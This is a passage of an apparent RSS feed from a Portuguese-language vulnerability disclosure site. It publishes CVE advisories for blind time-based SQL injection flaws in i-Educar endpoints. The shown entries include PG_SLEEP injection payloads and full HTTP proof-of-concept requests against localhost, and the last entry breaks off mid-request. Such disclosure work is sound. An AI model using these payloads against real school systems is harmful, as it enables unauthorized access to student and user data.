    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10011</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10011/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10011/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10011-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoedit&amp;#34;&amp;gt;CVE-2025-10011: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10011-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoedit&amp;#34;&amp;gt;CVE-2025-10011: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /module/TabelaArredondamento/edit?id=1&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 680
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/TabelaArredondamento/edit?id=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10011/image.png&amp;#34;
	width=&amp;#34;1126&amp;#34;
	height=&amp;#34;1006&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10011/image_hu_6843a63da889ac32.png 480w, /p/cve-2025-10011/image_hu_2a61729ca2b8044e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;268px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10012</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10012/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10012/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10012-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-ref_cod_aluno-do-endpoint-educar_historico_escolar_lstphp&amp;#34;&amp;gt;CVE-2025-10012: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10012-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-ref_cod_aluno-do-endpoint-educar_historico_escolar_lstphp&amp;#34;&amp;gt;CVE-2025-10012: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;AND 6986=(SELECT 6986 FROM PG_SLEEP(5))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206&#43;AND&#43;6986=(SELECT&#43;6986&#43;FROM&#43;PG_SLEEP(5)) HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
